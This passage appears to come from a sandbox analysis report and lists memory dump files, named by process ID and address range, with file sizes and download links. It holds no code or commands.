memory/4036-134-0x0000000000000000-mapping.dmp

Download
memory/4052-683-0x0000000005460000-0x000000000595E000-memory.dmp

Filesize
5.0MB

Download
memory/4160-614-0x0000000000000000-mapping.dmp

Download
memory/4208-621-0x0000000000000000-mapping.dmp

Download
memory/4448-547-0x0000000000000000-mapping.dmp

Download
memory/4476-647-0x0000000000000000-mapping.dmp

Download
memory/4492-551-0x0000000000000000-mapping.dmp

Download
memory/4496-651-0x0000000000000000-mapping.dmp

Download
memory/4532-555-0x0000000000000000-mapping.dmp

Download
memory/4532-569-0x0000000005220000-0x00000000052BC000-memory.dmp

Filesize
624KB

Download
memory/4556-628-0x000001EE415C0000-0x000001EE415E0000-memory.dmp

Filesize
128KB

Download
memory/4556-629-0x000001EE415E0000-0x000001EE41600000-memory.dmp

Filesize
128KB

Download
memory/4556-558-0x0000000000000000-mapping.dmp

Download
memory/4556-578-0x00007FFFDB520000-0x00007FFFDB522000-memory.dmp

Filesize
8KB

Download
memory/4556-589-0x000001EE415A0000-0x000001EE415C0000-memory.dmp

Filesize
128KB

Download
memory/4564-653-0x0000000000000000-mapping.dmp

Download
memory/4588-561-0x0000000000000000-mapping.dmp

Download
memory/4648-657-0x0000000000000000-mapping.dmp

Download
memory/4672-655-0x0000000000000000-mapping.dmp

Download
memory/4680-574-0x0000000000000000-mapping.dmp

Download
memory/4720-659-0x0000000000000000-mapping.dmp

Download
memory/4732-581-0x0000000000000000-mapping.dmp

Download
memory/4792-663-0x0000000000000000-mapping.dmp

Download
memory/4804-665-0x000000000047B92E-mapping.dmp

Download
memory/4804-671-0x00000000052F0000-0x00000000057EE000-memory.dmp

Filesize
5.0MB

Download
memory/4856-585-0x0000000000000000-mapping.dmp

Download
memory/4940-590-0x0000000000000000-mapping.dmp

Download
memory/4980-594-0x0000000000000000-mapping.dmp

Download
memory/5020-598-0x0000000000000000-mapping.dmp

Download
memory/5060-602-0x0000000000000000-mapping.dmp

Download
memory/5100-606-0x0000000000000000-mapping.dmp

Download